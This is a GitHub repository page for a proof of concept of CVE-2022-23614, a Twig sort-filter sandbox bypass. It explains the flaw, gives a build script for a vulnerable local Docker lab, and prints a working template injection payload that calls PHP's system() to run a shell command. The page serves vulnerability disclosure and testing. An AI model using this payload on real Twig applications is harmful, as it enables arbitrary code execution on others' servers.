Skip to content

PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)

Notifications You must be signed in to change notification settings

AnduriCaser/CVE-2022-23614

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-23614

PoC for CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Twig sort filter code execution/sandbox bypass)

As seen in this commit - https://github.com/twigphp/Twig/commit/.., twig was passing user supplied function name as a callback parameter to uasort (here), thus leading to arbitrary code execution

To build and run the docker container with a vulnerable twig version

$ ./build-docker.sh

Open the webpage at localhost:1337 and try rendering the following payload

{{ ['id','']|sort('system') }}

PoC PoC

Result Result

About

PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PHP 76.5%
  • Dockerfile 12.7%
  • HTML 8.2%
  • Shell 2.6%